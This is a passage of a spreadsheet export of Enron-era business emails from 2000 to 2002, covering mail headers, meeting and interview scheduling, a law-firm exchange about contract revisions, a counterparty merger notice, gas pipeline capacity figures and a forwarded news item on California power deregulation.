 with ESMTP id &lt;0GLG00JRFX36FW@sims1.rcsntx.swbell.net&gt; for_x000D_
 rogertan@sims-ms-daemon; Fri, 19 Oct 2001 14:36:10 -0500 (CDT)_x000D_
Received: from mail.ngigpi.com ([205.252.36.66]) by mta1.rcsntx.swbell.net_x000D_
 (Sun Internet Mail Server sims.3.5.2000.01.05.12.18.p9)_x000D_
 with ESMTP id &lt;0GLG00DE9WU1UK@mta1.rcsntx.swbell.net&gt; for_x000D_
 rogertan@sims1.rcsntx.swbell.net; Fri, 19 Oct 2001 14:30:04 -0500 (CDT)_x000D_
Received: from postmaster.enron.com (outbound5.enron.com [192.152.140.9])_x000D_
 by mail.ngigpi.com (8.8.7/8.8.7) with ESMTP id PAA12877 for_x000D_
 &lt;prices@intelligencepress.com&gt;; Fri, 19 Oct 2001 15:49:56 -0400_x000D_
Received: from corp.enron.com (nahou-msmsw03p.corp.enron.com [192.168.110.110])_x000D_
 by postmaster.enron.com (8.10.1/8.10.1/external_corp-1.08)_x000D_
 with ESMTP id f9JJYM304686 for &lt;prices@intelligencepress.com&gt;; Fri,_x000D_
 19 Oct 2001 14:34:22 -0500 (CDT)_x000D_
Received: from nahou-mscnx04p.corp.enron.com (unverified)_x000D_
 by corp.enron.com (Content Technologies SMTPRS 4.2.1)_x000D_
 with SMTP id &lt;T56b1cb0411c0a86e6e7c0@corp.enron.com&gt;; Fri,_x000D_
 19 Oct 2001 14:34:19 -0500_x000D_
Received: from NAHOU-MSMBX03V.corp.enron.com ([192.168.110.40])_x000D_
 by nahou-mscnx04p.corp.enron.com with Microsoft SMTPSVC(5.0.2195.2966); Fri,_x000D_
 19 Oct 2001 14:34:18 -0500_x000D_
Date: Fri, 19 Oct 2001 14:10:30 -0500_x000D_
From: "Keavey, Peter F." &lt;Peter.F.Keavey@enron.com&gt;_x000D_
To: "Dowjones1 (E-mail)" &lt;dina.omeara@dowjones.com&gt;,_x000D_
 "Dowjones2 (E-mail)" &lt;john.edmiston@dowjones.com&gt;,_x000D_
 "Gas Daily (E-mail)" &lt;gas_daily@ftenergy.com&gt;,_x000D_
 "Iferc1 (E-mail)" &lt;kelley_doolan@mcgraw-hill.com&gt;,_x000D_
 "Iferc2 (E-mail)" &lt;liane_kucher@mcgraw-hill.com&gt;,_x000D_
 "NGI (E-mail)" &lt;prices@intelligencepress.com&gt;_x000D_
Message-id: &lt;3891F8E98C93214B9E3E913CB7BF600220DBAE@NAHOU-MSMBX03V.corp.enron.com&gt;_x000D_
MIME-version: 1.0_x000D_
Content-type: multipart/mixed ; boundary="{66F55626-74EF-464A-8091-1A50AA781FCE}"_x000D_
Content-description: Daily Price Sheet.xls_x000D_
X-MimeOLE: Produced By Microsoft Exchange V6.0.4712.0_x000D_
content-class: urn:content-classes:message_x000D_
Thread-Index: AcFY0bfkgyLG5zANTMqxzjaQ/tR0Ig==_x000D_
X-OriginalArrivalTime: 19 Oct 2001 19:34:18.0616 (UTC)_x000D_
 FILETIME=[0B6E9780:01C158D5]_x000D_
_x000D_
_x000D_
--{66F55626-74EF-464A-8091-1A50AA781FCE}--</t>
  </si>
  <si>
    <t>frozenset({'citymgr@southside-place.org'})</t>
  </si>
  <si>
    <t>Re: FW: Council - P/Z Workshop on Monday Night April 2</t>
  </si>
  <si>
    <t xml:space="preserve">David-_x000D_
_x000D_
I just got back in town.  Monday the 2nd will work for me._x000D_
_x000D_
Susan_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
David Moss &lt;CityMgr@southside-place.org&gt; on 03/21/2001 12:03:22 PM_x000D_
To: "'susan.w.pereira@enron.com'" &lt;susan.w.pereira@enron.com&gt;, _x000D_
"'lucy1@ev1.net'" &lt;lucy1@ev1.net&gt;_x000D_
cc:  _x000D_
Subject: FW: Council - P/Z Workshop on Monday Night April 2_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&gt;  -----Original Message-----_x000D_
&gt; From:  David Moss_x000D_
&gt; Sent: Tuesday, March 20, 2001 13:27_x000D_
&gt; To: 'susan.w.pereira@enron.com'; 'lucy1@ev1.net'_x000D_
&gt; Subject: Council - P/Z Workshop on Monday Night April 2_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Susan and Dora:_x000D_
&gt;_x000D_
&gt; Would you be able to meet with councilmembers on Monday, April 2 to_x000D_
&gt; discuss the comprehensive plan and various planning issues?_x000D_
&gt;_x000D_
&gt; The backup date would be March 29th._x000D_
&gt;_x000D_
&gt; Maurice and John are available on April 2._x000D_
&gt;_x000D_
&gt; Staff will call Brad Smolen and Doug Bland, new member, about this date_x000D_
&gt; also._x000D_
&gt;_x000D_
&gt; dnm_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 24 Oct 2001 11:54:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'john.keiser@enron.com', 'steve.gilbert@enron.com'})</t>
  </si>
  <si>
    <t>FW: template for Lay Reviews</t>
  </si>
  <si>
    <t>opps, forgot the attachements_x000D_
_x000D_
 _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Geaccone, Tracy  _x000D_
Sent:	Wednesday, October 24, 2001 1:53 PM_x000D_
To:	Keiser, John; Gilbert, Steve_x000D_
Subject:	template for Lay Reviews_x000D_
_x000D_
Please change EGS to ETS.  Let me know if you have any questions.  Lets use the Arial font._x000D_
_x000D_
Thanks_x000D_
_x000D_
Tracy</t>
  </si>
  <si>
    <t>Wed, 25 Jul 2001 00:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeff.dasovich@enron.com', 'paul.kaufman@enron.com', 'alan.comnes@enron.com', 'susan.mara@enron.com'})</t>
  </si>
  <si>
    <t>Budget</t>
  </si>
  <si>
    <t>I'll send the Outside Services portion separately.  Thanks!</t>
  </si>
  <si>
    <t>Wed, 2 Jan 2002 13:44:19 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Test</t>
  </si>
  <si>
    <t>It worked._x000D_
_x000D_
Thanks ds_x000D_
--------------------------_x000D_
Sent from my BlackBerry Wireless Handheld (www.BlackBerry.net)</t>
  </si>
  <si>
    <t>Fri, 9 Feb 2001 00:59:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'chris.townsend@piperrudnick.com'})</t>
  </si>
  <si>
    <t>RE: Titan-Schaeffer Option.DOC</t>
  </si>
  <si>
    <t xml:space="preserve">Chris,_x000D_
_x000D_
Your invoice for December reflects final revisions to the documents through _x000D_
December 20th, so I'm assuming the draft the Schaeffer's signed was done _x000D_
subsequent to anything transmitted on December 13th.   However, emailing _x000D_
documents directly to me and calling me on the phone will be a big help._x000D_
_x000D_
Thanks for your response,_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Townsend, Christopher J. - CHI" &lt;chris.townsend@piperrudnick.com&gt; on _x000D_
02/08/2001 05:39:21 PM_x000D_
To: "'Kay.Mann@enron.com '" &lt;Kay.Mann@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: RE: Titan-Schaeffer Option.DOC_x000D_
_x000D_
Kay -- _x000D_
_x000D_
I understand that we have received your revisions to the Schaffer Option_x000D_
Agreement and are in the process of incorporating them into the document._x000D_
We will then contact the Schaffers' attorneys and get the changes_x000D_
incorporated._x000D_
_x000D_
We apologize for the confusion regarding the last set of revisions.  Those_x000D_
revisions arose following our teleconference with the Schaffers' attorneys._x000D_
Apparently, Don was acting under the assumption that you were tied up on_x000D_
other matters and had coordinated with Stuart, Fred and Rusty._x000D_
Nevertheless, you should be able to find a copy in your electronic file_x000D_
attached to a December 13, 2000 email from Fred.  Although Don had_x000D_
subsequent conversations with Rusty and Stuart, we should have circled back_x000D_
with you._x000D_
_x000D_
In the future, we will ensure that you receive email copies of all of the_x000D_
documents, with the changes highlighted as you requested._x000D_
_x000D_
Please feel free to contact me if you would like to discuss this matter_x000D_
further. _x000D_
_x000D_
Thank you._x000D_
_x000D_
Christopher J. Townsend _x000D_
Piper Marbury Rudnick &amp; Wolfe _x000D_
203 N. LaSalle Street _x000D_
Chicago, IL 60601 _x000D_
(312) 368-4039 (direct line) _x000D_
(312) 630-6300 (direct fax) _x000D_
christopher.townsend@piperrudnick.com _x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
-----Original Message-----_x000D_
From: Kay.Mann@enron.com_x000D_
To: Way, Karen S. - CHI_x000D_
Cc: chris.townsend@piperrudnick.com_x000D_
Sent: 2/7/01 7:07 PM_x000D_
Subject: Re: Titan-Schaeffer Option.DOC_x000D_
_x000D_
_x000D_
Karen,_x000D_
_x000D_
It appears to  me that revisions were made to this agreement, and the_x000D_
agreement was presented to the counterparty for signature without me_x000D_
being_x000D_
consulted.  Perhaps you did email this to me and I can't locate the_x000D_
electonic file.  In any event, in the future, please call me on the_x000D_
telephone  BEFORE revisions are made to documents and presented to the_x000D_
counterparty.  If you can't reach me by phone, send me an explanatory_x000D_
email. Also, please email me redlines against prior drafts.  This will_x000D_
faciliate my review.  Faxing drafts does not work for me._x000D_
_x000D_
I will send you the required changes tomorrow._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Way, Karen S. - CHI" &lt;karen.way@piperrudnick.com&gt; on 01/30/2001_x000D_
10:53:27_x000D_
AM_x000D_
_x000D_
To:   "'kathleen.carnahan@enron.com'" &lt;kathleen.carnahan@enron.com&gt;,_x000D_
      "'Kay.mann@enron.com'" &lt;Kay.mann@enron.com&gt;_x000D_
cc:_x000D_
_x000D_
Subject:  Titan-Schaeffer Option.DOC_x000D_
_x000D_
_x000D_
 &lt;&lt;Titan-Schaeffer Option.DOC&gt;&gt;_x000D_
_x000D_
Kathleen and Kay:_x000D_
Per Kathleen's voicemail this morning, attached hereto please find the_x000D_
most_x000D_
recent version of the Titan-Schaffer Option Agreement for your use._x000D_
Please_x000D_
feel free to contact me with any questions or comments you may have on_x000D_
this_x000D_
matter._x000D_
_x000D_
Best regards,_x000D_
Karen_x000D_
_x000D_
_x000D_
Karen S. Way_x000D_
Piper Marbury Rudnick &amp; Wolfe_x000D_
203 N. LaSalle_x000D_
Chicago, Illinois 60601_x000D_
email:  karen.way@piperrudnick.com_x000D_
(ph) 312-368-2152_x000D_
(fax) 312-630-6347_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_________________________________________________________________________x000D_
_____x000D_
_x000D_
The information contained in this communication may be confidential, is_x000D_
intended only for the use of the recipient named above, and may be_x000D_
legally_x000D_
privileged.  If the reader of this message is not the intended_x000D_
recipient,_x000D_
you are hereby notified that any dissemination, distribution, or copying_x000D_
of_x000D_
this communication, or any of its contents, is strictly prohibited. If_x000D_
you_x000D_
have received this communication in error, please re-send this_x000D_
communication to the sender and delete the original message and any copy_x000D_
of_x000D_
it from your computer system._x000D_
Thank you._x000D_
_x000D_
For more information about Piper Marbury Rudnick &amp; Wolfe, please visit_x000D_
us_x000D_
at http://www.piperrudnick.com/_x000D_
_________________________________________________________________________x000D_
_____x000D_
_x000D_
(See attached file: Titan-Schaeffer Option.DOC)_x000D_
_x000D_
_x000D_
 &lt;&lt;Titan-Schaeffer Option.DOC&gt;&gt; _x000D_
_____________________________________________________________________________x000D_
The information contained in this communication may be confidential, is _x000D_
intended only for the use of the recipient named above, and may be legally _x000D_
privileged.  If the reader of this message is not the intended recipient, you _x000D_
are hereby notified that any dissemination, distribution, or copying of this _x000D_
communication, or any of its contents, is strictly prohibited. If you have _x000D_
received this communication in error, please re-send this communication to _x000D_
the sender and delete the original message and any copy of it from your _x000D_
computer system._x000D_
Thank you._x000D_
_x000D_
For more information about Piper Marbury Rudnick &amp; Wolfe, please visit us at _x000D_
http://www.piperrudnick.com/_x000D_
_____________________________________________________________________________x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 4 Jan 2001 10:50:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Merger - El Paso Merchant Energy, L.P.</t>
  </si>
  <si>
    <t xml:space="preserve">Sounds good to me._x000D_
_x000D_
_x000D_
_x000D_
	Tanya Rohauer_x000D_
	01/04/2001 03:35 PM_x000D_
		 _x000D_
		 To: Mark Taylor/HOU/ECT@ECT_x000D_
		 cc: Tana Jones/HOU/ECT@ECT_x000D_
		 Subject: Merger - El Paso Merchant Energy, L.P._x000D_
_x000D_
I would think adding the name would be adequate; do you agree?_x000D_
---------------------- Forwarded by Tanya Rohauer/HOU/ECT on 01/04/2001 03:21 _x000D_
PM ---------------------------_x000D_
   _x000D_
_x000D_
_x000D_
From:  Veronica Espinoza @ ENRON                                              _x000D_
               01/04/2001 03:26 PM	_x000D_
	_x000D_
	_x000D_
	                           _x000D_
	_x000D_
_x000D_
To: Tanya Rohauer/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Merger - El Paso Merchant Energy, L.P._x000D_
_x000D_
Pertaining to the email below--I spoke to El Paso this morning about the _x000D_
gty's (there are a total of 3 in question covering financial and physical _x000D_
deals w/ENA, HPL, and EPMI).  They agreed to have those three amended to _x000D_
include the name El Paso Merchant Energy, LP (as they only include Gas, LP).  _x000D_
This is what their Legal is recommending in order to have the gty amendments _x000D_
executed ASAP and to make it as clean as possible (since 2 of the 3 gty's are _x000D_
tied to contracts).  Also, the amendments will be made effective as of _x000D_
12/31/00._x000D_
_x000D_
Let me know if you think we should ask for completely new gty's._x000D_
_x000D_
Veronica_x000D_
---------------------- Forwarded by Veronica Espinoza/Corp/Enron on _x000D_
01/04/2001 03:20 PM ---------------------------_x000D_
From: Tana Jones@ECT on 01/04/2001 02:28 PM_x000D_
To: Bob Bowen/HOU/ECT@ECT, Laurel Adams/HOU/ECT@ECT, Andrea R _x000D_
Guillen/HOU/ECT@ECT, Larry Joe Hunter/HOU/ECT@ECT, Gordon _x000D_
Heaney/Corp/Enron@ENRON, Janie Aguayo/HOU/ECT@ECT, Derek _x000D_
Bailey/Corp/Enron@ENRON, Diane Anderson/NA/Enron@Enron, Kevin _x000D_
Meredith/Corp/Enron@ENRON, Scott Tackett/Corp/Enron@Enron, Celeste _x000D_
Cisneros/NA/Enron@Enron, Tiffany Williams/NA/Enron@Enron, Kim S _x000D_
Theriot/HOU/ECT@ECT, Dianne Seib/CAL/ECT@ECT, Melissa Ann Murphy/HOU/ECT@ECT, _x000D_
William S Bradford/HOU/ECT@ECT, Debbie R Brackett/HOU/ECT@ECT, Tanya _x000D_
Rohauer/HOU/ECT@ECT, Brant Reves/HOU/ECT@ECT, Tracy Ngo/PDX/ECT@ECT, Lesli _x000D_
Campbell/HOU/ECT@ECT, Veronica Espinoza/Corp/Enron@ENRON, Paul _x000D_
Radous/Corp/Enron@ENRON, Wendi LeBrocq/Corp/Enron@Enron, Russell _x000D_
Diamond/HOU/ECT@ECT, Tom Moran/HOU/ECT@ECT, Edward Sacks/Corp/Enron@Enron, _x000D_
Nidia Mendoza/HOU/ECT@ECT, Bradley Diebner/HOU/ECT@ECT, Wendy _x000D_
Conwell/NA/Enron@ENRON, Brent Hendry/NA/Enron@Enron, Sara _x000D_
Shackleton/HOU/ECT@ECT, Mark Taylor/HOU/ECT@ECT, Carol St Clair/HOU/ECT@ECT, _x000D_
Susan Bailey/HOU/ECT@ECT, Mary Cook/HOU/ECT@ECT, Samantha _x000D_
Boyd/NA/Enron@Enron, Robert Bruce/NA/Enron@Enron, Stephanie _x000D_
Panus/NA/Enron@Enron, Marilyn Colbert/HOU/ECT@ECT, Diane _x000D_
Ellstrom/HOU/ECT@ECT, Lynn E Shivers/LON/ECT@ECT, Bill D Hare/HOU/ECT@ect, _x000D_
Leslie Reeves/HOU/ECT@ECT, Jason Moore/HOU/ECT@ECT, Dianne Seib/CAL/ECT@ECT, _x000D_
Samuel Schott/HOU/ECT@ECT, Anthony Campos/HOU/ECT@ECT, Bernice _x000D_
Rodriguez/HOU/ECT@ECT, Mary G Gosnell/HOU/ECT@ECT, Dale Neuner/HOU/ECT@ECT, _x000D_
Karen Lambert/HOU/ECT@ECT, Frank L Davis/HOU/ECT@ECT, Carrie _x000D_
Southard/LON/ECT@ECT, Amber Ebow/HOU/ECT@ECT, Adnan Patel/Corp/Enron@ENRON, _x000D_
Melissa Ann Murphy/HOU/ECT@ECT, Stacey Richardson/HOU/ECT@ECT, Lisa _x000D_
Lees/HOU/ECT@ECT, Georgi Landau/NA/Enron@ENRON_x000D_
cc: Jeffrey T Hodge/HOU/ECT@ECT, Jennifer Bagwell/NA/Enron@ENRON, Taffy _x000D_
Milligan/HOU/ECT@ECT _x000D_
_x000D_
Subject: Merger - El Paso Merchant Energy, L.P._x000D_
_x000D_
We have received copies of a Certificate of Merger filed with the Delaware _x000D_
Secretary of State on 12/22/00, effective 12/31/00, wherein El Paso Merchant _x000D_
Energy-Gas, L.P. (Global Counterparty #72297), a Delaware limited _x000D_
partnership, merged with and into El Paso Merchant Energy, L.P. (Global _x000D_
Counterparty #53350), a Delaware limited partnership, with El Paso Merchant _x000D_
Energy, L.P. (Global Counterparty #53350) as the surviving corporation._x000D_
_x000D_
By virtue of this merger, the ISDA Master Agreement dated 12/01/99 should now _x000D_
reflect El Paso Merchant Energy, L.P. as the Counterparty.  In connection _x000D_
with this merger, Credit will be getting a new parent guaranty from the _x000D_
Counterparty.  Upon its receipt, copies will be distributed._x000D_
_x000D_
Copies of the Certificate of Merger will be distributed._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 22 Feb 2001 07:35:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Stacy Durbin and Tony Pule</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Steven J Kean/NA/Enron on 02/22/2001 03:35 PM -----_x000D_
_x000D_
	Lexi Elliott_x000D_
	02/21/2001 03:21 PM_x000D_
		 _x000D_
		 To: Steven J Kean/NA/Enron@Enron, Brad Alford/NA/Enron@Enron_x000D_
		 cc: Jacqueline Coleman/NA/Enron@ENRON_x000D_
		 Subject: Stacy Durbin and Tony Pule_x000D_
_x000D_
Steve and Brad:_x000D_
_x000D_
We need to coordinate schedules in order to interview these last 2 candidates._x000D_
_x000D_
Stacy Durbin needs a round 2 interview and Tony Pule needs round 1 (he had a _x000D_
death in the family and was unable to attend last week)._x000D_
_x000D_
Please let me know when during next Monday, Tuesday, or Wednesday (February _x000D_
26-28) you would be available to donate 1 hour to interview these candidates._x000D_
_x000D_
Thank you!_x000D_
_x000D_
lexi_x000D_
3-4585_x000D_
</t>
  </si>
  <si>
    <t>Tue, 5 Jun 2001 09:13:36 -0700 (PDT)</t>
  </si>
  <si>
    <t>Storage Wildcards - Ziff Energy Group Conference</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Storage wildcards: weather, increased demand, flat supply _x000D_
_x000D_
Attend Ziff Energy's new storage conference and find out more from those who know: _x000D_
_x000D_
WEATHER ... Dan Guertin, Meteorologist, Sempra Energy Trading _x000D_
DEMAND ... T.J. Aruffo, VP Energy Supply Services, NiSource Inc. _x000D_
DELIVERABILITY ... Byron Wright, VP El Paso _x000D_
POWER IN THE WEST ... Blake Herndon, Director Risk Management, Williams Energy Marketing &amp; Trading _x000D_
_x000D_
Other speakers ... Rick Daniel, President, AEC Storage &amp; Hub Services Inc., David Nightingale, VP MHP/Duke, David Manning, VP Keyspan Energy, Paul Bieniawski, Director, Enron North America; Mark Cook, VP, Aquila Energy Marketing; ; Brad King, VP Storage, Conoco Gas &amp; Power Marketing; David Modesett, VP, Axia Energy;  Jim Thompson, Industry Analyst, DOE;._x000D_
_x000D_
Attendees...We are expecting an impressive attendee list that includes such companies as Aquila,  BP Canada, El Paso, Enron, Duke Energy, Falcon Gas Storage, Questar, Reliant Energy,  Union Gas, and Williams._x000D_
_x000D_
Storage 2001-2002: A Source of Stability or Chaos? _x000D_
June 22, 2001 _x000D_
Houston _x000D_
_x000D_
Registration Fee:  $795 _x000D_
_x000D_
To register or for more information, visit  http://www.ziffenergyconferences.com  _x000D_
phone (403) 234-6555 or e-mail us at gasconference@ziffenergy.com _x000D_
</t>
  </si>
  <si>
    <t>Tue, 27 Jun 2000 02:18:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Activity Survey - June 2000</t>
  </si>
  <si>
    <t>Attached please find the Activity Survey for the month of June, 2000._x000D_
_x000D_
The attached survey drives your costs from your activities to the commercial _x000D_
teams.  Please select your RCs, and fill in the driver quantity for the _x000D_
requested driver for the month of June. Please fill out the attached activity _x000D_
driver survey with June numbers for your RC and return to Shari Mao by end of _x000D_
day Friday, July 7,_x000D_
_x000D_
If your group currently generates a standard report that captures the _x000D_
surveyed data, please send the report to Jennifer Reside and Shari Mao.  This _x000D_
will eliminate your need to fill out this survey every month.  If you would _x000D_
like us to collect this information from someone within your team beginning _x000D_
next month, please let Jennifer know._x000D_
_x000D_
Please contact Jennifer Reside x3-5971 or myself with questions or if you are _x000D_
unable to complete the survey within the allotted time._x000D_
_x000D_
Thanks,_x000D_
Shari_x000D_
3-3859</t>
  </si>
  <si>
    <t>Thu, 21 Jun 2001 21:35:40 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Analyst Mtg - EB3321 (I did not confirm you) </t>
  </si>
  <si>
    <t>Leslie Rich, VP &amp;_x000D_
 Doris Kelly Waltkins, SVP, Portfolio Mgrs w/_x000D_
Evergreen Investment Mgmt Co._x000D_
 (Laura Valencia x36785)_x000D_
Mime-Version: 1.0_x000D_
Content-Type: text/plain; charset=us-ascii_x000D_
Content-Transfer-Encoding: 7bit_x000D_
X-From: Outlook-Migration-Team &lt;/O=ENRON/OU=NA/CN=RECIPIENTS/CN=EXCHMIGTEAM&gt;_x000D_
X-To: _x000D_
X-cc: _x000D_
X-bcc: _x000D_
X-Folder: \GWHALLE (Non-Privileged)\Calendar_x000D_
X-Origin: WHALLEY-G_x000D_
X-FileName: GWHALLE (Non-Privileged).pst_x000D_
_x000D_
6/19 - Per LT and Laura Valencia  - GW attending meeting, Larua getting lunch _x000D_
served</t>
  </si>
  <si>
    <t>Thu, 6 Dec 2001 11:59:18 -0800 (PST)</t>
  </si>
  <si>
    <t>California Capacity Report for Week of 12/03-12/06</t>
  </si>
  <si>
    <t xml:space="preserve">Transwestern's average deliveries to California were 1081 MMBtu/d (99%), with San Juan lateral throughput at 846 MMBtu/d.  Total East deliveries averaged 262 MMBtu/d.  _x000D_
_x000D_
El Paso's average deliveries to California were 2392 MMBtu/d (82%):_x000D_
- PG&amp;ETop, capacity of 1140 MMBtu/d, deliveries of 782 MMBtu/d (69%)_x000D_
- SoCalEhr, capacity 1250 MMBtu/d, deliveries of 1114 MMBtu/d (89%)_x000D_
- SoCalTop, capacity 540 MMBtu/d, deliveries of 496 MMBtu/d (92%)_x000D_
_x000D_
Thursday's posted Gas Daily prices:_x000D_
	SoCal gas, large pkgs	  2.365 (-.23)_x000D_
	PG&amp;E, large pkgs	  2.24 (-.30)_x000D_
	TW San Juan		  1.80    _x000D_
	TW Permian		  1.865 (-.49)_x000D_
_x000D_
Enron Online bases:  n/a_x000D_
			</t>
  </si>
  <si>
    <t>Thu, 20 Jul 2000 11:55:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: It was great meeting you guys</t>
  </si>
  <si>
    <t>Jeff, I fax the ecar hourly price index again for the 19th.  I did forget to _x000D_
put "attn:  bobette" on the fax to her.</t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 05:31:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jennifer.rudolph@enron.com', 'alan.comnes@enron.com', 'douglas.condon@enron.com', 'tim.belden@enron.com', 'neil.bresnan@enron.com', 'karen.denne@enron.com', 'skean@enron.com', 'robert.badeer@enron.com', 'sarah.novosel@enron.com', 'mpalmer@enron.com', 'mary.hain@enron.com', 'mona.petrochko@enron.com', 'dennis.benevides@enron.com', 'paul.kaufman@enron.com', 'susan.mara@enron.com', 'richard.shapiro@enron.com', 'harry.kingerski@enron.com', 'roger.yang@enron.com', 'chris.foster@enron.com', 'david.parquet@enron.com', 'christopher.calger@enron.com', 'james.steffes@enron.com', 'sandra.mccubbin@enron.com', 'martin.wenzel@enron.com', 'jeffery.fawcett@enron.com', 'laird.dyer@enron.com', 'joe.hartsoe@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Jeff Dasovich/NA/Enron on 12/13/2000 01:29 PM -----_x000D_
_x000D_
	"Katie Kaplan" &lt;kaplan@iepa.com&gt;_x000D_
	12/13/2000 01:23 PM_x000D_
	Please respond to kaplan_x000D_
		 _x000D_
		 To: "Douglas Kerner" &lt;DKK@eslawfirm.com&gt;, "Andy Brown" &lt;ABB@eslawfirm.com&gt;, _x000D_
"B Brown Andy" &lt;andybrwn@earthlink.net&gt;, "Bob Weisenmiller" _x000D_
&lt;rbw@mrwassoc.com&gt;, "Jan Smutny-Jones" &lt;smutny@iepa.com&gt;, "Jean Munoz" _x000D_
&lt;jmunoz@mcnallytemple.com&gt;, "Jeff Dasovich" &lt;Jeff.Dasovich@enron.com&gt;, "John _x000D_
Stout" &lt;John_H_Stout@reliantenergy.com&gt;, "Julee Malinowski-Ball" _x000D_
&lt;jmball@ns.net&gt;, "Karen Edson" &lt;kedson@ns.net&gt;, "Kassandra Gough" _x000D_
&lt;kgough@calpine.com&gt;, "kent Palmerton" &lt;kent.palmerton@williams.com&gt;, _x000D_
"Kristin Vellandi" &lt;kvellandi@pstrategies.com&gt;, "Marty Wilson" _x000D_
&lt;mwilson@pstrategies.com&gt;, "McNally Ray" &lt;rmcnally@mcnallytemple.com&gt;, _x000D_
"Norton Kelli" &lt;knorton@mcnallytemple.com&gt;, "Paula Hall-Collins" _x000D_
&lt;paula.hall-collins@williams.com&gt;, "Richard Hyde" &lt;rwhyde@duke-energy.com&gt;, _x000D_
"Stephanie-Newell" &lt;stephanie-newell@reliantenergy.com&gt;, "Sue Mara" _x000D_
&lt;smara@enron.com&gt;, "Tom Ross" &lt;tross@mcnallytemple.com&gt;, "Kate Castillo" _x000D_
&lt;ccastillo@riobravo-gm.com&gt;, "Bill Carlson" &lt;wcarlson@wm.com&gt;, "Bill Woods" _x000D_
&lt;billw@calpine.com&gt;, "Bob Escalante" &lt;rescalante@riobravo-gm.com&gt;, "Carolyn _x000D_
Baker" &lt;cabaker@duke-energy.com&gt;, "Cody Carter" &lt;cody.carter@williams.com&gt;, _x000D_
"Curt Hatton" &lt;curt.hatton@gen.pge.com&gt;, "Curtis Kebler" _x000D_
&lt;curtis_l_kebler@reliantenergy.com&gt;, "Dave Parquet" &lt;dparque@ect.enron.com&gt;, _x000D_
"Dean Gosselin" &lt;dean_gosselin@fpl.com&gt;, "Duane Nelsen" _x000D_
&lt;dnelsen@gwfpower.com&gt;, "Ed Tomeo" &lt;ed.tomeo@uaecorp.com&gt;, "Eileen Koch" _x000D_
&lt;eileenk@calpine.com&gt;, "Eric Eisenman" &lt;eric.eisenman@neg.pge.com&gt;, "Frank _x000D_
DeRosa" &lt;frank.derosa@gen.pge.com&gt;, "Greg Blue" &lt;gtbl@dynegy.com&gt;, "Hap Boyd" _x000D_
&lt;hap.boyd@enron.com&gt;, "Jack Pigott" &lt;jackp@calpine.com&gt;, "Jeff Dasovich" _x000D_
&lt;jdasovic@enron.com&gt;, "Jim Willey" &lt;elliottsa@earthlink.net&gt;, "Joe Greco" _x000D_
&lt;joe.greco@uaecorp.com&gt;, "Joe Ronan" &lt;joer@calpine.com&gt;, "Jonathan Weisgall" _x000D_
&lt;jweisgall@aol.com&gt;, "Ken Hoffman" &lt;khoffman@caithnessenergy.com&gt;, "Kent _x000D_
Fickett" &lt;kfickett@usgen.com&gt;, "Lynn Lednicky" &lt;lale@dynegy.com&gt;, "Marty _x000D_
McFadden" &lt;marty_mcfadden@ogden-energy.com&gt;, "Paula Soos" _x000D_
&lt;paula_soos@ogden-energy.com&gt;, "Randy Hickok" &lt;rjhickok@duke-energy.com&gt;, _x000D_
"Rob Lamkin" &lt;rllamkin@seiworldwide.com&gt;, "Roger Pelote" _x000D_
&lt;roger.pelote@williams.com&gt;, "Scott Noll" &lt;snoll@thermoecotek.com&gt;, "Steve _x000D_
Iliff" &lt;siliff@riobravo-gm.com&gt;, "Steve Ponder" &lt;steve_ponder@fpl.com&gt;, _x000D_
"Susan J Mara" &lt;Susan_J_Mara@enron.com&gt;, "Tony Wetzel" _x000D_
&lt;twetzel@thermoecotek.com&gt;, "Trond Aschehoug" &lt;taschehoug@thermoecotek.com&gt;, _x000D_
"William Hall" &lt;wfhall2@duke-energy.com&gt;, &lt;kaplan@iepa.com&gt;_x000D_
		 cc: "Karen Edson" &lt;kedson@ns.net&gt;, "Julee Malinowski-Ball" &lt;jmball@ns.net&gt;, _x000D_
"Douglas Kerner" &lt;DKK@eslawfirm.com&gt;, "B Brown Andy" _x000D_
&lt;andybrwn@earthlink.net&gt;, "Andy Brown" &lt;ABB@eslawfirm.com&gt;, "Jan _x000D_
Smutny-Jones" &lt;smutny@iepa.com&gt;, "Steven Kelly" &lt;steven@iepa.com&gt;_x000D_
		 Subject: FYI-Edison wants Reregulation_x000D_
_x000D_
DJ Edison To Call For End To Calif Elec_x000D_
                  Dereg Wed -Sources_x000D_
_x000D_
                  Copyright (c) 2000 Dow Jones &amp; Company, Inc._x000D_
_x000D_
_x000D_
                  LOS ANGELES (Dow Jones)--Edison International (EIX),_x000D_
saying the current state of_x000D_
                  California's power markets threatens the company with_x000D_
bankruptcy, will call Wednesday_x000D_
                  for an end to California's four-year experiment with_x000D_
deregulation, sources familiar with_x000D_
                  the issue told Dow Jones Newswires._x000D_
_x000D_
                       John Bryson, chief executive of Edison International,_x000D_
is expected to announce that_x000D_
